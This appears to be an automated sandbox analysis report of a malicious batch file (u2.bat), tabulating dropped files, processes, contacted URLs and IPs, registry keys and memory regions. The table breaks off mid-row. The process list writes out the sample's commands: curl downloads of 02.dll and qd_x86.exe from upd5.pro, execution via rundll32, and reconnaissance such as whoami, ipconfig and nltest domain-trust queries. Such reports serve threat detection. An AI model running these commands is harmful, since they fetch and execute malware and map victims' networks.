Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
u2.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\qd_x86.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\teorema505[1].htm
|
ASCII text, with very long lines (812), with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\upgrade-browser[1].htm
|
HTML document, Unicode text, UTF-8 text, with very long lines (4343)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\1.txt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\1.txt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Mozilla\1.txt
|
International EBCDIC text, with NEL line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Skype\1.txt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\com.adobe.dunamis\1.txt
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\02.dll
|
PE32+ executable (GUI) x86-64, for MS Windows
|
modified
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe 02.dll,checkit
|
|
|
|
C:\Windows\System32\wermgr.exe
|
C:\Windows\System32\wermgr.exe
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping -n 5 localhost
|
|
|
|
C:\Users\user\Desktop\qd_x86.exe
|
qd_x86.exe
|
|
|
|
C:\Windows\System32\ipconfig.exe
|
ipconfig /all
|
|
|
|
C:\Windows\System32\whoami.exe
|
whoami /all
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\curl.exe
|
curl -o 02.dll https://upd5.pro/update/02.dll
|
||
|
C:\Windows\System32\curl.exe
|
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\nltest.exe
|
nltest /domain_trusts /all_trusts
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\qwinsta.exe
|
qwinsta
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://upd5.pro/update/qd_x86.exeWinsta0
|
unknown
|
||
|
https://upd5.pro/update/02.dllws
|
unknown
|
||
|
https://s2.go-mpulse.net/boomerang/
|
unknown
|
||
|
https://developer.oracle.com/
|
unknown
|
||
|
https://tags.tiqcdn.com/
|
unknown
|
||
|
https://www.oracle.com/asset/web/fonts/redwoodicons.woff2
|
unknown
|
||
|
https://consent.trustarc.com
|
unknown
|
||
|
https://search.oracle.com/results
|
unknown
|
||
|
https://upd5.pro/update/02.dll
|
45.77.68.166
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-192.png
|
unknown
|
||
|
https://www.oracle.com/upgrade-browser/
|
unknown
|
||
|
https://d.oracleinfinity.io
|
unknown
|
||
|
https://www.oracle.com/asset/web/fonts/oraclesansvf.woff2
|
unknown
|
||
|
https://academy.oracle.com/en/oa-web-overview.html
|
unknown
|
||
|
https://s.go-mpulse.net/boomerang/
|
unknown
|
||
|
https://investor.oracle.com/home/default.aspx
|
unknown
|
||
|
https://www.google.com/chrome/
|
unknown
|
||
|
https://tms.oracle.com/
|
unknown
|
||
|
https://oracle.com/
|
138.1.33.162
|
||
|
https://upd5.pro/update/02.dllcej
|
unknown
|
||
|
https://upd5.pro/update/02.dllLE_S
|
unknown
|
||
|
https://twitter.com/oracle
|
unknown
|
||
|
https://www.youtube.com/oracle/
|
unknown
|
||
|
https://c.go-mpulse.net
|
unknown
|
||
|
https://dc.oracleinfinity.io
|
unknown
|
||
|
https://upd5.pro/update/qd_x86.exe)
|
unknown
|
||
|
https://www.oracle.com/corporate/accessibility/
|
unknown
|
||
|
https://upd5.pro/update/02.dll)
|
unknown
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-128.png
|
unknown
|
||
|
https://tms.oracle.com/main/prod/utag.js
|
unknown
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-32.png
|
unknown
|
||
|
https://search.oracle.com/events?q=&lang=english
|
unknown
|
||
|
https://secure.ethicspoint.com/domain/media/en/gui/31053/index.html
|
unknown
|
||
|
https://tms.oracle.com/main/prod/utag.sync.js
|
unknown
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-152.png
|
unknown
|
||
|
https://developer.oracle.com/python/what-is-python/
|
unknown
|
||
|
https://www.oracle.com/
|
unknown
|
||
|
https://upd5.pro/update/02.dllg5m
|
unknown
|
||
|
https://oracle.112.2o7.net
|
unknown
|
||
|
https://upd5.pro/update/qd_x86.execurl
|
unknown
|
||
|
https://go.oracle.com/subscriptions
|
unknown
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-180.png
|
unknown
|
||
|
https://upd5.pro/update/qd_x86.exe
|
45.77.68.166
|
||
|
https://upd5.pro/update/02.dllcurl
|
unknown
|
||
|
https://upd5.pro/update/qd_x86.exeb
|
unknown
|
||
|
https://upd5.pro/update/02.dllWinsta0
|
unknown
|
||
|
https://upd5.pro/update/qd_x86.exee
|
unknown
|
||
|
https://profile.oracle.com/myprofile/account/create-account.jspx
|
unknown
|
||
|
https://tms.oracle.com/main/dev/utag.js
|
unknown
|
||
|
https://www.linkedin.com/company/oracle/
|
unknown
|
||
|
https://www.oracle.com/asset/web/favicons/favicon-120.png
|
unknown
|
||
|
https://s.go-mpulse.net
|
unknown
|
||
|
https://www.oracle.com/webapps/redirect/signon?nexturl=
|
unknown
|
||
|
https://search.oracle.com/results?q=u30searchterm&size=10&page=1&tab=all
|
unknown
|
There are 44 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
upd5.pro
|
45.77.68.166
|
||
|
oracle.com
|
138.1.33.162
|
||
|
www.oracle.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.77.68.166
|
upd5.pro
|
United States
|
||
|
138.1.33.162
|
oracle.com
|
United States
|
||
|
62.204.41.234
|
unknown
|
United Kingdom
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
28f2d15c
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
363a97f0
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
fa90976e
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
41c3f245
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
ee9dd8db
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
e5df8c45
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
29758cdb
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
e458d1c2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7f5dc413
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
2237d845
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
7eda9994
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
923fc21
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
87acfbc2
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
619582bf
|
||
|
HKEY_CURRENT_USER_Classes\cvvpdekvwdatiu
|
98e3e0e9
|
There are 65 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
18984734000
|
direct allocation
|
page read and write
|
|
|
|
189849C6000
|
heap
|
page read and write
|
|
|
|
18984761000
|
direct allocation
|
page execute and read and write
|
|
|
|
18984731000
|
direct allocation
|
page execute read
|
|
|
|
18984700000
|
direct allocation
|
page execute and read and write
|
|
|
|
1F37BA95000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092D70000
|
heap
|
page read and write
|
||
|
1486138D000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1B92943C000
|
heap
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
1B929452000
|
heap
|
page read and write
|
||
|
DDD000
|
unkown
|
page write copy
|
||
|
2209512E000
|
heap
|
page read and write
|
||
|
22094A50000
|
heap
|
page read and write
|
||
|
7F1FAFD000
|
stack
|
page read and write
|
||
|
D60000
|
unkown
|
page readonly
|
||
|
22090DB3000
|
heap
|
page read and write
|
||
|
464CB2C000
|
stack
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
22092803000
|
heap
|
page read and write
|
||
|
22092E12000
|
heap
|
page read and write
|
||
|
2209395E000
|
heap
|
page read and write
|
||
|
14861340000
|
heap
|
page read and write
|
||
|
1B9293B0000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093F57000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093EB3000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
18984733000
|
direct allocation
|
page readonly
|
||
|
22AF12D5000
|
heap
|
page read and write
|
||
|
14861392000
|
heap
|
page read and write
|
||
|
148613AB000
|
heap
|
page read and write
|
||
|
18984730000
|
direct allocation
|
page read and write
|
||
|
1B9293F8000
|
heap
|
page read and write
|
||
|
136E000
|
stack
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
1B92940C000
|
heap
|
page read and write
|
||
|
24237100000
|
heap
|
page read and write
|
||
|
20F248E0000
|
heap
|
page read and write
|
||
|
2209395E000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
7E4A97E000
|
stack
|
page read and write
|
||
|
22094A5E000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22094A52000
|
heap
|
page read and write
|
||
|
22093458000
|
heap
|
page read and write
|
||
|
7E4A87C000
|
stack
|
page read and write
|
||
|
79CF6FE000
|
stack
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
FFE48DB000
|
stack
|
page read and write
|
||
|
24237106000
|
heap
|
page read and write
|
||
|
20F24510000
|
heap
|
page read and write
|
||
|
14A0000
|
heap
|
page read and write
|
||
|
39B44FF000
|
stack
|
page read and write
|
||
|
2209395A000
|
heap
|
page read and write
|
||
|
149F000
|
stack
|
page read and write
|
||
|
14861360000
|
remote allocation
|
page read and write
|
||
|
7E4A8FE000
|
stack
|
page read and write
|
||
|
22AF1088000
|
heap
|
page read and write
|
||
|
22092F40000
|
remote allocation
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
22092807000
|
heap
|
page read and write
|
||
|
14861240000
|
heap
|
page read and write
|
||
|
22092F40000
|
trusted library allocation
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092F40000
|
remote allocation
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093950000
|
heap
|
page read and write
|
||
|
22092E12000
|
heap
|
page read and write
|
||
|
22094A53000
|
heap
|
page read and write
|
||
|
148613AB000
|
heap
|
page read and write
|
||
|
22092D8C000
|
heap
|
page read and write
|
||
|
22AF12D0000
|
heap
|
page read and write
|
||
|
7F1F79C000
|
stack
|
page read and write
|
||
|
189848E0000
|
trusted library allocation
|
page read and write
|
||
|
189848C0000
|
heap
|
page read and write
|
||
|
22092F40000
|
trusted library allocation
|
page read and write
|
||
|
180328000
|
unkown
|
page write copy
|
||
|
1F37B849000
|
heap
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
20F248E5000
|
heap
|
page read and write
|
||
|
DDE000
|
unkown
|
page write copy
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22093950000
|
heap
|
page read and write
|
||
|
22093E85000
|
heap
|
page read and write
|
||
|
14861407000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
132E000
|
stack
|
page read and write
|
||
|
22092E2D000
|
heap
|
page read and write
|
||
|
22090FB0000
|
trusted library allocation
|
page read and write
|
||
|
148613D4000
|
heap
|
page read and write
|
||
|
2209513A000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093EB8000
|
heap
|
page read and write
|
||
|
DE2000
|
unkown
|
page read and write
|
||
|
39B45FF000
|
stack
|
page read and write
|
||
|
20F24580000
|
heap
|
page read and write
|
||
|
22092E1D000
|
heap
|
page read and write
|
||
|
2209518E000
|
heap
|
page read and write
|
||
|
1B929452000
|
heap
|
page read and write
|
||
|
22093968000
|
heap
|
page read and write
|
||
|
24237030000
|
heap
|
page read and write
|
||
|
18982D6F000
|
heap
|
page read and write
|
||
|
DE4000
|
unkown
|
page readonly
|
||
|
39B43FF000
|
stack
|
page read and write
|
||
|
2209283B000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
14861385000
|
heap
|
page read and write
|
||
|
22093EC4000
|
heap
|
page read and write
|
||
|
22092F65000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
20F245A2000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
DC8000
|
unkown
|
page readonly
|
||
|
1B92943C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
464CE7E000
|
stack
|
page read and write
|
||
|
189830E0000
|
heap
|
page read and write
|
||
|
22093060000
|
trusted library allocation
|
page read and write
|
||
|
20F24589000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
14861388000
|
heap
|
page read and write
|
||
|
220927FC000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
14861370000
|
heap
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
1F37B810000
|
heap
|
page read and write
|
||
|
1B929442000
|
heap
|
page read and write
|
||
|
22092D9F000
|
heap
|
page read and write
|
||
|
22094A5C000
|
heap
|
page read and write
|
||
|
22093953000
|
heap
|
page read and write
|
||
|
E9B000
|
stack
|
page read and write
|
||
|
220927EC000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
14861390000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
14E0000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092812000
|
heap
|
page read and write
|
||
|
2423710B000
|
heap
|
page read and write
|
||
|
22AF1030000
|
heap
|
page read and write
|
||
|
22093F50000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
2209536F000
|
heap
|
page read and write
|
||
|
22094A5A000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
220927D4000
|
heap
|
page read and write
|
||
|
22093F4C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
464CBAE000
|
stack
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
18982D00000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
FFE495E000
|
stack
|
page read and write
|
||
|
22092D8A000
|
heap
|
page read and write
|
||
|
2209280B000
|
heap
|
page read and write
|
||
|
FFE4C7E000
|
stack
|
page read and write
|
||
|
22093060000
|
trusted library allocation
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1486138D000
|
heap
|
page read and write
|
||
|
30DF000
|
heap
|
page read and write
|
||
|
14861377000
|
heap
|
page read and write
|
||
|
1B929402000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
1B92940C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
180331000
|
unkown
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092E2D000
|
heap
|
page read and write
|
||
|
18982D40000
|
heap
|
page read and write
|
||
|
1B92942A000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
22093EB4000
|
heap
|
page read and write
|
||
|
189847A0000
|
heap
|
page read and write
|
||
|
14861550000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092E1D000
|
heap
|
page read and write
|
||
|
22AF0F50000
|
heap
|
page read and write
|
||
|
22092F40000
|
remote allocation
|
page read and write
|
||
|
79CF36C000
|
stack
|
page read and write
|
||
|
DE4000
|
unkown
|
page readonly
|
||
|
22093E90000
|
heap
|
page read and write
|
||
|
1B929403000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
DC8000
|
unkown
|
page readonly
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
1B92942A000
|
heap
|
page read and write
|
||
|
18032D000
|
unkown
|
page read and write
|
||
|
148613C0000
|
heap
|
page read and write
|
||
|
24236F30000
|
heap
|
page read and write
|
||
|
1486138E000
|
heap
|
page read and write
|
||
|
1509000
|
heap
|
page read and write
|
||
|
1B92943B000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22AF1050000
|
heap
|
page read and write
|
||
|
22093F50000
|
heap
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
24237010000
|
heap
|
page read and write
|
||
|
1F37B852000
|
heap
|
page read and write
|
||
|
18984760000
|
direct allocation
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092D85000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
16DF000
|
stack
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
79CF67F000
|
stack
|
page read and write
|
||
|
14EE000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
242373A5000
|
heap
|
page read and write
|
||
|
22092816000
|
heap
|
page read and write
|
||
|
22093F4C000
|
heap
|
page read and write
|
||
|
1B9293F0000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1B92940E000
|
heap
|
page read and write
|
||
|
22092770000
|
trusted library allocation
|
page read and write
|
||
|
1B929429000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22090DE3000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
1B9293D0000
|
remote allocation
|
page read and write
|
||
|
79CF3EE000
|
unkown
|
page read and write
|
||
|
1B929560000
|
heap
|
page read and write
|
||
|
22092E2D000
|
heap
|
page read and write
|
||
|
22093E8C000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
14861407000
|
heap
|
page read and write
|
||
|
18982D48000
|
heap
|
page read and write
|
||
|
148613EE000
|
heap
|
page read and write
|
||
|
2209395A000
|
heap
|
page read and write
|
||
|
7F1FA7D000
|
stack
|
page read and write
|
||
|
1F37B7F0000
|
heap
|
page read and write
|
||
|
230D1FE000
|
stack
|
page read and write
|
||
|
22094A5F000
|
heap
|
page read and write
|
||
|
1B92946B000
|
heap
|
page read and write
|
||
|
22092E12000
|
heap
|
page read and write
|
||
|
7E4A9FE000
|
stack
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22093E71000
|
heap
|
page read and write
|
||
|
39B42FD000
|
stack
|
page read and write
|
||
|
148613BE000
|
heap
|
page read and write
|
||
|
148613C4000
|
heap
|
page read and write
|
||
|
22AF10A1000
|
heap
|
page read and write
|
||
|
2209280A000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1B92946B000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1B9293D0000
|
remote allocation
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
1B92943C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
1B929406000
|
heap
|
page read and write
|
||
|
79CF77E000
|
stack
|
page read and write
|
||
|
220951A6000
|
heap
|
page read and write
|
||
|
22094FD3000
|
heap
|
page read and write
|
||
|
22093EDC000
|
heap
|
page read and write
|
||
|
D61000
|
unkown
|
page execute read
|
||
|
180000000
|
unkown
|
page readonly
|
||
|
22093E81000
|
heap
|
page read and write
|
||
|
22092E12000
|
heap
|
page read and write
|
||
|
230D0FE000
|
stack
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
D60000
|
unkown
|
page readonly
|
||
|
14861389000
|
heap
|
page read and write
|
||
|
148613AB000
|
heap
|
page read and write
|
||
|
F9C000
|
stack
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
D61000
|
unkown
|
page execute read
|
||
|
22092D50000
|
heap
|
page read and write
|
||
|
1B929410000
|
heap
|
page read and write
|
||
|
148613D4000
|
heap
|
page read and write
|
||
|
1486138D000
|
heap
|
page read and write
|
||
|
2209280C000
|
heap
|
page read and write
|
||
|
22092D80000
|
heap
|
page read and write
|
||
|
14861320000
|
heap
|
page read and write
|
||
|
22092E31000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092EA2000
|
heap
|
page read and write
|
||
|
1F37BA90000
|
heap
|
page read and write
|
||
|
14861407000
|
heap
|
page read and write
|
||
|
14861360000
|
remote allocation
|
page read and write
|
||
|
189848E0000
|
trusted library allocation
|
page read and write
|
||
|
22090DE1000
|
heap
|
page read and write
|
||
|
148613EE000
|
heap
|
page read and write
|
||
|
148613AB000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
20F24540000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
22092D5C000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
22092E21000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
14861390000
|
heap
|
page read and write
|
||
|
14861407000
|
heap
|
page read and write
|
||
|
20F24520000
|
heap
|
page read and write
|
||
|
22093957000
|
heap
|
page read and write
|
||
|
22092861000
|
heap
|
page read and write
|
||
|
DDD000
|
unkown
